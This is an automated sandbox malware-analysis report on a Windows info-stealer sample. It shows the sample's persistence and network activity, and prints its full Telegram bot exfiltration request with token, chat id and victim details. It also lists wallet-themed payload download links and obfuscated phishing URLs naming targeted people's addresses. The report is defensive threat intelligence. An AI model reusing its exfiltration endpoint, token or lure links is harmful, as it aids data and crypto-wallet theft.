Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem2
Process Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
Application Window Discovery
Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
System Network Configuration Discovery
Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
file.exe63%ReversingLabsWin32.Ransomware.Generic
file.exe100%Joe Sandbox ML
SourceDetectionScannerLabelLink
C:\Program Files\Windows Media Player\graph\graph.exe0%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://drive.google.co0%Avira URL Cloudsafe
https://clients2.goo0%Avira URL Cloudsafe
https://drive-daily-2.corp.google.co0%Avira URL Cloudsafe
https://drive-staging.corp.google.co0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
ipinfo.io
34.117.59.81
truefalse
    high
    drive.google.com
    172.217.17.46
    truefalse
      high
      drive.usercontent.google.com
      142.250.181.65
      truefalse
        high
        s-part-0035.t-0009.t-msedge.net
        13.107.246.63
        truefalse
          high
          api.telegram.org
          149.154.167.220
          truefalse
            high
            NameMaliciousAntivirus DetectionReputation
            https://api.telegram.org/bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20065367%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTMLfalse
              high
              https://ipinfo.io/jsonfalse
                high
                NameSourceMaliciousAntivirus DetectionReputation
                https://ipinfo.io/missingauthfile.exe, 00000000.00000003.1463728013.0000023218955000.00000004.00000020.00020000.00000000.sdmp, json[1].json.2.dr, json[1].json.0.drfalse
                  high
                  https://api.telegram.org/botfile.exefalse
                    high
                    https://drive.google.com/wfile.exe, 00000000.00000003.1441377935.000002321892D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1463728013.000002321892D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1490397342.000002321892D000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://drive.google.com/uc?id=URL:file.exefalse
                        high
                        https://payments.google.com/payments/v4/js/integrator.js313AE9Efile.exe, 00000002.00000003.1361274764.0000012D10306000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361501894.0000012D10310000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://ipinfo.io/jsonN/Aipcountryfile.exefalse
                            high
                            https://drive.usercontent.google.com/T)file.exe, 00000002.00000003.1464989617.0000012D10359000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://payments.google.com/file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361452113.0000012D1034E000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://sandbox.google.com/payments/v4/js/integrator.jsfile.exe, 00000002.00000003.1361501894.0000012D10310000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://link.storjshare.io/s/jx3obcnqgxa2u364c52wel6vrxba/cardan-shafts/Trazor%20(Software).zip?downfile.exefalse
                                    high
                                    https://api.telegram.org/botFailedfile.exefalse
                                      high
                                      https://link.storjshare.io/s/jvrb5lh3pynx3et56bisfuuguvoq/cardan-shafts/Electrum%20(Software)(1).zipfile.exefalse
                                        high
                                        https://docs.google.com/file.exe, 00000002.00000003.1361452113.0000012D1034E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://drive-staging.corp.google.com/file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://api.telegram.org/.dfile.exe, 00000002.00000002.1503968722.0000012D10304000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://api.telegram.org/Jfile.exe, 00000000.00000002.1490638191.000002321A600000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://drive.google.com/file.exe, 00000002.00000003.1361452113.0000012D1034E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://ipinfo.io/jsonbdfile.exe, 00000002.00000002.1503968722.0000012D10304000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://api.telegram.org/file.exe, 00000002.00000002.1503968722.0000012D10304000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://drive-daily-2.corp.google.cofile.exe, 00000002.00000003.1464989617.0000012D10328000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://chrome.google.com/webstoremfile.exe, 00000000.00000003.1354266433.000002321891D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1354180465.000002321891C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353854851.00000232188FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353888422.000002321890D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1354458754.000002321891D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1354061434.0000023218911000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.google.com/;Tfile.exe, 00000002.00000003.1360968091.0000012D1030E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361126576.0000012D10313000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361147206.0000012D10318000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://drive.usercontent.google.com/load_gfile.exe, 00000002.00000003.1464989617.0000012D10328000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://link.storjshare.io/s/jwkj6ktyi5kumzjvhrw6bdbvyceq/cardan-shafts/Ledger%20(Software).zip?downfile.exefalse
                                                              high
                                                              https://ipinfo.io/Wfile.exe, 00000000.00000003.1461383595.0000023218964000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1462458747.000002321896D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1490397342.0000023218955000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://chrome.google.com/webstoreRcfile.exe, 00000002.00000003.1361248501.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361365160.0000012D1032F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361329796.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://ipinfo.io/jsonJdfile.exe, 00000002.00000002.1503968722.0000012D10304000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://api.telegram.org/dentifierfile.exe, 00000002.00000002.1503968722.0000012D10374000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://clients2.goofile.exe, 00000000.00000002.1490397342.0000023218906000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://api.telegram.org/bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0ofile.exe, 00000000.00000002.1490638191.000002321A600000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://ipinfo.io/jsonFdfile.exe, 00000002.00000002.1503968722.0000012D10304000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://link.storjshare.io/s/jvs5vlroulyshzqirwqzg7wys2wq/cardan-shafts/Atomic%20(Software)(2).zip?dfile.exefalse
                                                                            high
                                                                            https://api.telegram.org/-file.exe, 00000002.00000002.1503968722.0000012D10304000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://chrome.google.com/webstorefile.exe, 00000002.00000003.1361452113.0000012D1034E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://payments.google.com/payments/v4/js/integrator.js00F7FC9file.exe, 00000002.00000003.1361274764.0000012D10306000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361501894.0000012D10310000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://drive-daily-2.corp.google.com/file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://ipinfo.io/Sfile.exe, 00000000.00000003.1463728013.000002321891C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1490397342.0000023218906000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://drive-autopush.corp.google.com/file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://payments.google.com/payments/v4/js/integrator.jsfile.exe, 00000002.00000003.1361274764.0000012D10306000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361501894.0000012D10310000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://drive-daily-4.corp.google.com/file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://api.telegram.org/2file.exe, 00000000.00000002.1490638191.000002321A600000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://chrome.google.com/webstorehfile.exe, 00000002.00000003.1361064723.0000012D10341000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361033757.0000012D10328000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1360996024.0000012D1031E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361452113.0000012D1034E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://drive.usercontent.google.com/file.exe, 00000002.00000003.1464255067.0000012D10393000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1503968722.0000012D10374000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://drive.google.com/uc?id=file.exefalse
                                                                                                    high
                                                                                                    https://chrome.google.com/webstoreQfile.exe, 00000000.00000003.1353932053.0000023218926000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353854851.00000232188FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353888422.000002321890D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353955254.0000023218931000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://sandbox.google.com/payments/v4/js/ifile.exe, 00000002.00000003.1360968091.0000012D1030E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361126576.0000012D10313000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://drive-daily-1.corp.google.com/file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://www.google.com/Ffile.exe, 00000002.00000003.1361064723.0000012D10341000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361033757.0000012D10328000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1360996024.0000012D1031E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361452113.0000012D1034E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://drive.usercontent.google.com/Agent:file.exe, 00000002.00000002.1503968722.0000012D10304000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1464989617.0000012D10328000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://drive-daily-5.corp.google.com/file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://sandbox.google.com/payments/v4/js/integrator.jsF6DFAA4Cfile.exe, 00000002.00000003.1361274764.0000012D10306000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361501894.0000012D10310000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://api.telegram.org/bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=74270file.exe, 00000002.00000002.1503968722.0000012D10374000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://www.google.com/pfile.exe, 00000000.00000003.1354266433.000002321891D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1354180465.000002321891C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353854851.00000232188FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353888422.000002321890D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1354458754.000002321891D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1354061434.0000023218911000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://chrome.google.com/webstore3Dfile.exe, 00000002.00000003.1361248501.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361329796.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://link.storjshare.io/s/jvbdgt4oiad73vsmb56or2qtzcta/cardan-shafts/Exodus%20(Software)(1).zip?dfile.exefalse
                                                                                                                          high
                                                                                                                          https://api.telegram.org/ndfile.exe, 00000002.00000002.1503968722.0000012D10304000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://ipinfo.io/file.exe, 00000000.00000003.1461383595.0000023218964000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1462458747.000002321896D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1490397342.0000023218955000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1503968722.0000012D10304000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1503968722.0000012D103BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1503968722.0000012D10369000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1503968722.0000012D10374000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://drive-daily-6.corp.google.com/file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://drive-daily-0.corp.google.com/file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://api.telegram.org/t-477772811-jspbfile.exe, 00000002.00000002.1503968722.0000012D10374000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://drive-preprod.corp.google.com/file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://www.google.com/om/file.exe, 00000000.00000003.1354165171.00000232188F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://drive-staging.corp.google.cofile.exe, 00000000.00000002.1490397342.0000023218906000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        https://chrome.google.com/webstore/file.exe, 00000000.00000003.1354266433.000002321891D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1354180465.000002321891C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353854851.00000232188FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353888422.000002321890D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1354458754.000002321891D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1354061434.0000023218911000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://sandbox.google.com/file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361452113.0000012D1034E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://www.google.com/file.exe, 00000002.00000003.1361452113.0000012D1034E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://drive.google.cofile.exe, 00000000.00000003.1353854851.00000232188FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353831153.00000232188F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://chrome.google.com/webstore7file.exe, 00000002.00000003.1361274764.0000012D10306000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361365160.0000012D10311000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://drive-daily-3.corp.google.com/file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://ipinfo.io/&file.exe, 00000000.00000003.1461383595.0000023218964000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1490397342.0000023218955000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                    • 75% < No. of IPs
                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                    149.154.167.220
                                                                                                                                                    api.telegram.orgUnited Kingdom
                                                                                                                                                    62041TELEGRAMRUfalse
                                                                                                                                                    172.217.17.46
                                                                                                                                                    drive.google.comUnited States
                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                    34.117.59.81
                                                                                                                                                    ipinfo.ioUnited States
                                                                                                                                                    139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                                                                                                    142.250.181.65
                                                                                                                                                    drive.usercontent.google.comUnited States
                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                    Analysis ID:1573853
                                                                                                                                                    Start date and time:2024-12-12 16:52:46 +01:00
                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                    Overall analysis duration:0h 6m 29s
                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                    Report type:full
                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                    Number of analysed new started processes analysed:12
                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                    Technologies:
                                                                                                                                                    • HCA enabled
                                                                                                                                                    • EGA enabled
                                                                                                                                                    • AMSI enabled
                                                                                                                                                    Analysis Mode:default
                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                    Sample name:file.exe
                                                                                                                                                    Detection:MAL
                                                                                                                                                    Classification:mal80.troj.spyw.winEXE@8/9@4/4
                                                                                                                                                    EGA Information:
                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                    HCA Information:
                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                    • Number of executed functions: 80
                                                                                                                                                    • Number of non-executed functions: 124
                                                                                                                                                    Cookbook Comments:
                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200
                                                                                                                                                    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                    • VT rate limit hit for: file.exe
                                                                                                                                                    TimeTypeDescription
                                                                                                                                                    10:54:23API Interceptor15836x Sleep call for process: graph.exe modified
                                                                                                                                                    15:53:39Task SchedulerRun new task: MyBootTask path: C:\Users\user\Desktop\file.exe
                                                                                                                                                    15:53:53AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Graph C:\Program Files\Windows Media Player\graph\graph.exe
                                                                                                                                                    15:54:01AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Graph C:\Program Files\Windows Media Player\graph\graph.exe
                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    149.154.167.220TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      fWAr4zGUkY.exeGet hashmaliciousRemcos, Amadey, StealcBrowse
                                                                                                                                                        Shipping Documents.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                          T#U00fcbitak SAGE RfqF#U0334D#U0334P#U0334..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                            https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23Xamy.lynt@busey.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                              Message_2712729.emlGet hashmaliciousunknownBrowse
                                                                                                                                                                https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23XNick.Atkin@Yorkshirehousing.co.ukGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                  HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                    Bank Swift and SOA PVRN0072700314080353_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                      DEC 2024 RFQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                        34.117.59.81file.exeGet hashmaliciousInvicta Stealer, XWormBrowse
                                                                                                                                                                        • ipinfo.io/json
                                                                                                                                                                        Code%20Send%20meta%20Discord%20EXE.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                        • ipinfo.io/json
                                                                                                                                                                        idl57nk7gk.exeGet hashmaliciousNeshtaBrowse
                                                                                                                                                                        • ipinfo.io/json
                                                                                                                                                                        idl57nk7gk.exeGet hashmaliciousNeshtaBrowse
                                                                                                                                                                        • ipinfo.io/json
                                                                                                                                                                        FormulariomillasbonusLATAM_GsqrekXCVBmUf.cmdGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • ipinfo.io/json
                                                                                                                                                                        172.104.150.66.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                        • ipinfo.io/json
                                                                                                                                                                        VertusinstruccionesFedEX_66521.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • ipinfo.io/json
                                                                                                                                                                        UjbjOP.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                        • ipinfo.io/json
                                                                                                                                                                        I9xuKI2p2B.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                        • ipinfo.io/json
                                                                                                                                                                        licarisan_api.exeGet hashmaliciousIcarusBrowse
                                                                                                                                                                        • ipinfo.io/ip
                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                        ipinfo.iofile.exeGet hashmaliciousInvicta Stealer, XWormBrowse
                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                        http://enteolcl.top/Get hashmaliciousUnknownBrowse
                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                        Product Blueprint..htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                        dYUteuvmHn.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                        https://drive.google.com/file/d/1yoYdaJg2olHzjqEKXjn6nnXKPPak7HoL/view?usp=sharing_eil&ts=675747b9Get hashmaliciousUnknownBrowse
                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                        zW72x5d91l.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                        https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                        eEiHdLSfum.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                        eEiHdLSfum.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                        Code%20Send%20meta%20Discord%20EXE.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                        s-part-0035.t-0009.t-msedge.netfile.exeGet hashmaliciousInvicta Stealer, XWormBrowse
                                                                                                                                                                        • 13.107.246.63
                                                                                                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                        • 13.107.246.63
                                                                                                                                                                        ICK6LzM018.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 13.107.246.63
                                                                                                                                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                        • 13.107.246.63
                                                                                                                                                                        Passenger Itinerary.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 13.107.246.63
                                                                                                                                                                        Payment Advice-Dec-2024.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 13.107.246.63
                                                                                                                                                                        ZzS8KjNjr7.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                                                                                        • 13.107.246.63
